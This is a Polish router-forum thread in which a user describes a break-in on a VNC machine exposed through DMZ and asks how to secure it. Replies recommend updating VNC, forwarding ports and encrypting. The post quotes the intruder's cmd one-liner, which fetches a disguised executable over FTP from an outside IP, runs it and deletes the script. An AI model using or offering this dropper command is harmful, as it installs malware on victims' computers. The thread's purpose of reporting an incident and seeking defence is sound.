Może to nie najwłaściwszy dział ale chce żebyście się zapoznali z tym problemem może sie przydać.Odpaliłem usługę DDns na tomato i zainstalowałem na jednym z komputerów VNC do przejmowania pulpitu, ip komputera wpisałem w tomato do DMZ i uzyskałem zdalny dostęp, hasło do VNC było 8 znakowe literowo cyfrowe. Wszystko chodziło jak trzeba dopoki na komputerze przejętym nie zobaczyłem że ktoś próbuje sie odpalic usługę FTP poprzez wpis do /start/uruchom komendę:[b]cmd /c echo OPEN 83.31.207.110 21491>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit ktora spowodowała odpalenie serera FTP na komputerze przejetym. I teraz moje pytanie spotkaliscie sie z czyms takim? Dla mnie dziwne wydaje sie to ze przejecie przez osobę 3 bądź trojana nastąpiło po około 6min po zmianie adresu ip u mnie (neo) więc bardzo szybko adres IP mojego lącza nie odpowiada na ping więc chyba stosowanie skanerów odpada dodatkowo komenda odpalająca tego ftp wpisywała sie bardzo szybko jakby z automatu bądż została wklejona. Nie dziwiło by mnie to gdybym posiadal stały IP i ta usługa była odpalona chociaż pare dni natomiast ten włam nastąpił po około 12h ze zmieniającym sie IP.
I teraz pytanko jak mozna to zabezpieczyc obecnie mam tak ze zmieniłem porty w VNC i kompa wlaczam w dmz tylko wtedy jak potrzebuje przejąc maszynę ale jest to dosyc upierdliwe i nadal występuje ryzyko włamu tylko w kótszym okresie czasu, czekam na rady i sugestie.Edytowany przez stiepa dnia 18-03-2007 11:59
Po pierwsze tak jak sugeruje stegano uaktualnij VNC
Po drugie nie wstawiaj kompa do DMZ tylko przekieruj odpowiedni port na routerze.
Po trzecie używaj UltraVNC (najbardziej zaawansowany i umożliwiający szyfrowanie) + wtyczka szyfrująca
· Łącznie użytkowników: 24,115 · Najnowszy użytkownik: Ja
Czat
Musisz się zalogować, aby opublikować wiadomość.
Maniek91PL
06-11-2024 22:37
dzięki !
maxikaaz
29-10-2024 14:27
@Maniek91PL - Administration=> Admin Access, i tam masz "Allow Wireless Access" do zaznaczenia
Maniek91PL
26-10-2024 22:07
siemka! ktoś przypomni co się ustawiało jeśli nie mogę wejść od strony wifi do tomato? od lan działa
overflow2
04-10-2024 17:34
Kupowałem Asusy n10u albo n12d1 ale nie widzę ich, chyba już nie produkują, Chodzi o coś nowego i taniego. Transfery niewielkie.
maxikaaz
04-10-2024 09:38
@overflow2 patrząc po dostępności funkcji w nowych kompilacjach, to chyba nawet WRT54G/GL jeszcze ma OpenVPN, albo jakiś odpowiednik... zależy, na jakie transfery liczysz.
overflow2
30-09-2024 20:53
Jaki aktualnie najtańszy router do tomato do openvpn?
maxikaaz
27-07-2024 15:07
@servee - na początek router do rozebrania i obejrzenia, ciężko wróżyć tak tylko po objawach
maxikaaz
27-07-2024 14:55
@servee - cały kontroler nie pada tak sobie z powodu "zbiegu okoliczności", więc prawdopodobnie gdzieś przepięcie.
servee
25-07-2024 13:33
@maxikaaz: działało, aż pewnego pięknego dnia przestało działać. W tym dniu była też burza, ale to raczej zbieg okoliczności.
maxikaaz
25-07-2024 11:38
@servee - o ile problem jest w obrębie samych wyjść (dławiki, warystory), to naprawialne, ale jeśli w samym SoC - to nienaprawialne ze względu na koszta. A co było przyczyną?
' target='_blank'>Link
